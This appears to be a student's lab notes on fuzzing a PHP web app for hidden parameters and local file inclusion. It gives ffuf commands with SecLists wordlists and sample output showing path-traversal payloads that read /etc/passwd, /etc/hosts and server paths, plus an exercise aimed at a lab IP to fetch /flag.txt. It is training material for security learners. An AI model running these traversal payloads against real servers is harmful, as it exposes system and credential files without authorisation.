It's important to always fuzz a web app beceause the page may have other exposed parameters that are not linked to any HTML forms , and hence normal users would never access or unintentionally cause harm through.
fuzz the page for common GET
parameters ->
Copy ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
And once we found a hidden param, we can do our LFI tests. A good wordlist is LFI-Jhaddix.txt , as it contains various bypasses and common files
Copy ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
With some output that would look like this:
Copy ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd [Status: 200, Size: 3661, Words: 645, Lines: 91]
../../../../../../../../../../../../etc/hosts [Status: 200, Size: 2461, Words: 636, Lines: 72]
...SNIP...
../../../../etc/passwd [Status: 200, Size: 3661, Words: 645, Lines: 91]
We must also try and fuzz for Server webroot path
, server configurations file
, and server logs
.
we can fuzz for the index.php
file through common webroot paths, which we can find in this wordlist for Linux or this wordlist for Windows . Depending on our LFI situation, we may need to add a few back directories (e.g. ../../../../
), and then add our index.php
afterwords.
Copy ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
and the output would be something like:
Copy /var/www/html/ [Status: 200, Size: 0, Words: 1, Lines: 1]
To find server logs and configuration paths, we can use this wordlist for Linux or this wordlist for Windows
Copy ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
output:
Copy <SNIP>
/etc/hosts [Status: 200, Size: 2461, Words: 636, Lines: 72]
/etc/hostname [Status: 200, Size: 2300, Words: 634, Lines: 66]
<SNIP>
Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt
Copy ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://94.237.53.113:55545/index.php?FUZZ=value' -fs 2309
Copy ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.53.113:55545/index.php?view=FUZZ' -fs 1935